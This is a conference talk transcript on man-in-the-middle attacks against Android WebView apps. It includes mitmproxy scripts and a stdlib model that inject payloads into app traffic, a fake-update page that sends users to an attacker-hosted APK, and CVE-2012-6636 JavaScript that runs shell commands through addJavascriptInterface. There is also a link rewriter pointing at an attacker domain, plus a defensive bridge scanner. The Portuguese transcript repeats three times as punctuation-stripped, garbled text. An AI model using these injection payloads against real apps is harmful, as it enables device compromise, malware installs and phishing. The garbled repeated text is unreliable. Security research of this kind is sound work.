MITM attacks on Android apps: abusing developers' trust
DESCRIPTION
Many Android apps contain instances of the WebView class and its derivatives in order to process and render web content (HTML, JavaScript, etc.). In this presentation I explore three ways of harming the user, all of them based on the app not authenticating the information returned to it. I illustrate the talk using popular Brazilian apps.
TRANSCRIPT
Security BSides São Paulo, ed. naovaitercopa
MITM attacks on Android apps
Abusing developers' trust
Ivan "Joker" Jeukens
ivanjokerbr@gmail.com
Menu
Conclusions
Motivation
Operational setup
Injecting
Payload 1
Payload 2
Payload 3
Practicality
Conclusions
No app validates the data it exchanges with its server
Only HTTPS gets in the way
Motivation
Born out of web app pentesting
Many apps are modified and/or extended browsers (WebView, ChromeWebView, etc.)
Advantage
– we have the client code, in addition to the server's responses
– obfuscation? uhh
Initial idea
– capture in the app → server direction. Danger!
– targeted attacks
Operational setup
Android SDK
– AVD: Android 4.0.3, CPU/ABI Intel Atom
mitmproxy.org
– Python scripts to manipulate requests and responses
code.google.com/p/android-apktool
– unpack the APK and produce the smali
github.com/egirault/googleplay-api.git
– scripts to download apps from Play
Real-world MITM
– iptables and airbase-ng
Injecting
# mitmproxy inline script (Python 2 API of the time). isXml/isJson/isJavascript/isHtmlText
# and scanForHtmlTag are the speaker's own helpers and are not shown in the deck.
from lxml import etree

parser = etree.XMLParser()

def response(ctx, flow):
    headers = flow.response.headers
    if flow.response.content is not None and isXml(headers["Content-Type"]):
        etype = headers["Content-Encoding"]   # remember how the server encoded the body
        flow.response.decode()                # inflate it so it can be parsed
        root = etree.XML(flow.response.content, parser)
        processXML(root)
        flow.response.content = etree.tostring(root, encoding="UTF-8")
        headers["Content-Encoding"] = etype
        if "gzip" in etype:
            flow.response.encode("gzip")      # hand the app back the encoding it expects
    elif flow.response.content is not None and (isJson(headers["Content-Type"]) or isJavascript(headers["Content-Type"])):
        ...
    elif flow.response.content is not None and isHtmlText(headers["Content-Type"]):
        ...
Injecting
def processXML(data, log=None):
    # walk every leaf element; where its text already carries HTML, swap in the payload
    for child in data.iter():
        if child is not None and child.tag is not None and isinstance(child.tag, basestring):
            if len(child) == 0 and child.text is not None:
                if scanForHtmlTag(child.text):
                    child.text = payload

payload = '<img width="30" height="43" title="" alt="" src="data:image/png;base64,..." />'
XML
Injecting
def processJson(data):
    # recurse through lists and dicts; append the payload to every string that already contains HTML
    if type(data) is list:
        for m in data:
            processJson(m)
    elif type(data) is dict:
        for key in data:
            if isinstance(data[key], unicode):
                if scanForHtmlTag(data[key]):
                    data[key] = data[key] + payload
            else:
                processJson(data[key])
    else:
        return
JSON
Injecting
from bs4 import BeautifulSoup

htmldata = BeautifulSoup(flow.response.content)
body = htmldata.body
# bs4 escapes a plain string passed to append(), so parse the payload into a tree first
body.append(BeautifulSoup(payload, "html.parser"))
HTML
Payload 1
Social engineering
The Veja magazine app
Payload 1
.class public Lcom/matera/veja/ui/StoryDetail;
...
.method private createWebView()V
...
Payload 1
A pretty image ...
– "your app is out of date and at risk"
A bit of JavaScript
<script>
function fase2() {
    var img = document.getElementById("chupacabra");
    img.src = "data:image/gif;base64,...";   // thanks
}
function goDown() {
    window.location.href = "http://joker.com/com.matera.veja.apk";   // the "update" the user is sent to fetch
    setTimeout(fase2, 3000);
}
</script>
<img id="chupacabra" onclick="goDown()" width="212" height="50" title="" alt="" src="data:image/gif;base64,...">
Payload 1
Cross your fingers
Payload 2
CVE-2012-6636
– "The Android API before 17 does not properly restrict the WebView.addJavascriptInterface method"
Affects Android < 4.2 ... in theory
– on some 2.3.x it does not work
– on some 3.x it does not work 100%
"Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code"
– ad libraries
Payload 2
Problems in the JavaScript → Java bridge
– addJavascriptInterface( )
<script>
function execute(args) {
    // from the bridge object, reflect up to java.lang.Runtime and run a command
    return window.Attack.getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(args);
}
</script></head><body>
<script>
execute(["/system/bin/sh", "-c", "echo -n JOKER > /data/data/test.webview/pwnd.txt"]);
</script>
// the app side that makes this possible:
WebSettings webSettings = browser.getSettings();
webSettings.setJavaScriptEnabled(true);
browser.addJavascriptInterface(new JsInvokeClass(), "Attack");
Payload 2
Android 4.2+ (API 17)
– requires @JavascriptInterface, method by method (only enforced when the app targets API 17 or higher; an older targetSdkVersion keeps every public method exposed even on a new device)
Statistics
googleplay-api
– script to download the 100 most popular free apps of every category
2379 apps downloaded; 922 use addJavascriptInterface; 339 (14%) have no @JavascriptInterface annotation
Payload 2
.class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;
.super Landroid/app/Activity;
...
const-string v7, "Android"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
...
const-string v7, "HTMLOUT"
invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
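The statistics slide above counts apps that call addJavascriptInterface and bridge classes with no @JavascriptInterface annotation; the Caixa smali shows what such a call looks like after apktool. The scanner below is an added example, not the speaker's tooling: it takes apktool output as {path: smali text}, finds each addJavascriptInterface() invoke, resolves the interface name and the bridge class from the registers, and reports whether any public method of that class carries the annotation. The smali sample is constructed (package and class names are made up) and mirrors the two-bridge "Android"/"HTMLOUT" shape of the Caixa slide. Register resolution is deliberately simple: the bridge object is traced back only through new-instance and iget-object/sget-object.

```python
"""Find WebView JavaScript bridges in apktool smali and check them for @JavascriptInterface.
Added example. Input: {path: smali text}. Output: one record per addJavascriptInterface() call."""
import re

INVOKE_RE = re.compile(r"invoke-virtual \{(?P<regs>[^}]*)\}, Landroid/webkit/WebView;->"
                       r"addJavascriptInterface\(Ljava/lang/Object;Ljava/lang/String;\)V")
CLASS_RE = re.compile(r"^\.class .*?(?P<name>L[\w/$]+;)", re.M)
METHOD_RE = re.compile(r"^\.method (?P<mods>[\w ]*?)(?P<name>[\w<>$]+)\(.*?^\.end method", re.M | re.S)
ANNOTATION = ".annotation runtime Landroid/webkit/JavascriptInterface;"


def _last_assignment(lines, upto, reg):
    """Walk back from the invoke to the most recent write into `reg`; return (opcode, operand)."""
    pat = re.compile(r"^\s*(?P<op>new-instance|iget-object|sget-object|const-string) %s, (?P<val>.+)$"
                     % re.escape(reg))
    for line in reversed(lines[:upto]):
        m = pat.match(line)
        if m:
            return m.group("op"), m.group("val").strip()
    return None, None


def _class_of(op, val):
    """Turn the operand of an object-producing opcode into a class descriptor (heuristic)."""
    if op == "new-instance":
        return val                                # new-instance v6, Lpkg/Bridge;
    if op in ("iget-object", "sget-object"):
        return val.rsplit(":", 1)[-1]             # ... Lpkg/Act;->field:Lpkg/Bridge;
    return None


def annotated_methods(smali):
    """Map each public non-constructor method of a class to whether it is @JavascriptInterface."""
    return {m.group("name"): ANNOTATION in m.group(0)
            for m in METHOD_RE.finditer(smali)
            if "public" in m.group("mods").split() and not m.group("name").startswith("<")}


def scan(smali_files):
    """One finding per bridge registration: JS-visible name, bridge class, what it exposes."""
    classes = {}
    for text in smali_files.values():
        m = CLASS_RE.search(text)
        if m:
            classes[m.group("name")] = text
    findings = []
    for path, text in smali_files.items():
        lines = text.splitlines()
        for i, line in enumerate(lines):
            m = INVOKE_RE.search(line)
            if not m:
                continue
            regs = [r.strip() for r in m.group("regs").split(",")]
            if len(regs) != 3:                    # {webview, object, name}; range form not handled
                continue
            _, name = _last_assignment(lines, i, regs[2])
            bridge = _class_of(*_last_assignment(lines, i, regs[1]))
            methods = annotated_methods(classes.get(bridge, ""))
            findings.append({
                "file": path,
                "js_name": (name or "?").strip('"'),
                "bridge": bridge,
                # None: bridge class not in the input; False: no annotation anywhere on the class
                "annotated": any(methods.values()) if methods else None,
                "unannotated_methods": sorted(k for k, v in methods.items() if not v),
            })
    return findings


def summarize(findings):
    """The two numbers the statistics slide counts per app."""
    return {"bridges": len(findings),
            "unannotated": sum(1 for f in findings if f["annotated"] is False)}


# Constructed smali in the shape of the Caixa slide; names are made up.
SAMPLE_SMALI = {
    "smali/com/example/bank/BankWebViewActivity.smali": """\
.class public Lcom/example/bank/BankWebViewActivity;
.super Landroid/app/Activity;
.method private setupWebView()V
    .locals 8
    iget-object v5, p0, Lcom/example/bank/BankWebViewActivity;->webView:Landroid/webkit/WebView;
    new-instance v6, Lcom/example/bank/LegacyBridge;
    invoke-direct {v6}, Lcom/example/bank/LegacyBridge;-><init>()V
    const-string v7, "Android"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    new-instance v6, Lcom/example/bank/HtmlOutBridge;
    invoke-direct {v6}, Lcom/example/bank/HtmlOutBridge;-><init>()V
    const-string v7, "HTMLOUT"
    invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    return-void
.end method
""",
    "smali/com/example/bank/LegacyBridge.smali": """\
.class public Lcom/example/bank/LegacyBridge;
.method public showToast(Ljava/lang/String;)V
    .locals 0
    return-void
.end method
""",
    "smali/com/example/bank/HtmlOutBridge.smali": """\
.class public Lcom/example/bank/HtmlOutBridge;
.method public processHTML(Ljava/lang/String;)V
    .locals 0
    .annotation runtime Landroid/webkit/JavascriptInterface;
    .end annotation
    return-void
.end method
""",
}

if __name__ == "__main__":
    for finding in scan(SAMPLE_SMALI):
        print(finding)
```

For a real APK, read every *.smali file under the apktool output directory into the dict. An "annotated: False" bridge is the interesting case: on a device below 4.2, or in an app whose targetSdkVersion is below 17, every public method of that object (and, through getClass(), the whole reflection API) is reachable from any page the WebView renders.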
Payload 3
Link changer
def processJson(data):
    # same walk as before, but any string that looks like a URL is pointed at the attacker's host
    if type(data) is list:
        for m in data:
            processJson(m)
    elif type(data) is dict:
        for key in data:
            if isinstance(data[key], unicode):
                if scanForHtmlTag(data[key]):
                    data[key] = data[key] + payload
                elif "http" in data[key]:
                    data[key] = "http://www.joker.com.br"
            else:
                processJson(data[key])
Payload 3
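The "Injecting" slides and this "Payload 3" slide are the same pipeline with a different rewrite rule: undo the transfer encoding, walk the XML or JSON body, change the string leaves, re-encode. The block below is an added, stdlib-only Python 3 model of that pipeline (it is not the speaker's mitmproxy script and does not depend on mitmproxy, lxml or BeautifulSoup); it carries both rules, append_payload for the injection slides and change_links for the link changer. The payload, the replacement URL and the feed samples are constructed for the example; the HTML branch inserts before </body> instead of using a parser.

```python
"""Stand-alone, stdlib-only model of the response() hook from the slides (added example).
A mutator gets every string leaf of an XML or JSON body and returns what to put back;
HTML bodies get the payload appended to <body>."""
import gzip
import json
import re
import xml.etree.ElementTree as ET

HTML_TAG_RE = re.compile(r"<\s*/?[a-zA-Z][^<>]*>")   # "does this string already carry markup?"
# Hypothetical payload: the deck's real one is an <img> with a base64 data: URI not reproduced here.
PAYLOAD = '<img width="30" height="43" alt="" src="data:image/png;base64,AAAA">'
LINK_TARGET = "http://www.joker.com.br"               # the slide's replacement URL


def scan_for_html_tag(text):
    """True when the string contains an HTML tag, i.e. the app will hand it to a WebView."""
    return HTML_TAG_RE.search(text) is not None


def append_payload(text):
    """'Injecting': only strings that are already HTML get the payload, so that it renders."""
    return text + PAYLOAD if scan_for_html_tag(text) else text


def change_links(text):
    """'Payload 3': as above, plus every URL-looking string is replaced wholesale."""
    if scan_for_html_tag(text):
        return text + PAYLOAD
    if "http" in text:
        return LINK_TARGET
    return text


def walk_json(node, mutate):
    """Recursively rebuild a decoded JSON document, mutating every string leaf."""
    if isinstance(node, list):
        return [walk_json(item, mutate) for item in node]
    if isinstance(node, dict):
        return {key: walk_json(value, mutate) for key, value in node.items()}
    if isinstance(node, str):
        return mutate(node)
    return node


def walk_xml(root, mutate):
    """Mutate the text of every leaf element (elements with no children)."""
    for element in root.iter():
        if len(element) == 0 and element.text is not None:
            element.text = mutate(element.text)
    return root


def mutate_body(headers, body, mutate):
    """Dispatch on Content-Type, undo gzip, rewrite, re-gzip; returns (headers, body)."""
    ctype = headers.get("Content-Type", "").lower()
    encoding = headers.get("Content-Encoding", "").lower()
    raw = gzip.decompress(body) if "gzip" in encoding else body

    if "xml" in ctype:
        out = ET.tostring(walk_xml(ET.fromstring(raw), mutate), encoding="utf-8")
    elif "json" in ctype:
        out = json.dumps(walk_json(json.loads(raw), mutate)).encode("utf-8")
    elif "html" in ctype:
        text = raw.decode("utf-8")
        idx = text.lower().rfind("</body>")          # parser-free stand-in for body.append()
        out = (text[:idx] + PAYLOAD + text[idx:] if idx >= 0 else text + PAYLOAD).encode("utf-8")
    else:
        return headers, body                          # other content types pass through untouched

    if "gzip" in encoding:
        out = gzip.compress(out)                      # the app expects the encoding it negotiated
    new_headers = dict(headers, **{"Content-Length": str(len(out))})
    return new_headers, out


# Constructed samples standing in for a news app's feed; not captured traffic.
SAMPLE_JSON = {"title": "Hello", "body": "<p>news</p>", "count": 3,
               "items": [{"url": "http://example.com/story/1"}]}
SAMPLE_XML = (b"<rss><channel><item><title>Hello</title>"
              b"<description>&lt;p&gt;news&lt;/p&gt;</description></item></channel></rss>")
SAMPLE_HTML = b"<html><body><h1>Story</h1></body></html>"


def demo():
    """Push the three samples through the hook and return the rewritten content."""
    _, out = mutate_body({"Content-Type": "application/json", "Content-Encoding": "gzip"},
                         gzip.compress(json.dumps(SAMPLE_JSON).encode("utf-8")), change_links)
    rewritten_json = json.loads(gzip.decompress(out))
    _, out = mutate_body({"Content-Type": "text/xml"}, SAMPLE_XML, append_payload)
    rewritten_xml = {el.tag: el.text for el in ET.fromstring(out).iter() if len(el) == 0}
    _, out = mutate_body({"Content-Type": "text/html"}, SAMPLE_HTML, append_payload)
    return rewritten_json, rewritten_xml, out.decode("utf-8")


if __name__ == "__main__":
    for part in demo():
        print(part)
```

Two details matter in practice and are easy to get wrong in a quick mitmproxy script: the body must be re-encoded with the Content-Encoding the server sent, and Content-Length must be recomputed, otherwise the app's HTTP client rejects or truncates the response and the injection never reaches the WebView.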
Practicality
You need to
– be near the target (wifi range)
– be lucky enough to catch one of its probes, or have it like your AP
– have a DB of vulnerable apps and scan the requests for one
– or
– be dedicated: recon the target first, go back to the lab and return with the apps that are vulnerable
– catch the moment of the request
Questions?
THANKS FOR WATCHING
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Menu
Conclusotildees
Motivaccedilatildeo
Setup operacional
Injetando
Payload 1
Payload 2
Payload 3
Praticidade
Conclusotildees
Nenhum aplicativo valida seus dados transmitidos
Soacute o https enche o saco
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Conclusotildees
Nenhum aplicativo valida seus dados transmitidos
Soacute o https enche o saco
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Motivaccedilatildeo
Nasceu de web app pentest
Muitos aplicativos satildeo navegadores modificados eou incrementados (WebView ChromeWebView etc)
Vantagem
ndash Temos o coacutedigo do cliente aleacutem das responstas do server
ndash Ofuscaccedilatildeo uhh Ideacuteia inicial
ndash Capturar na direccedilatildeo aplicativo rarr servidor Perigo
ndash Ataques direcionados
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
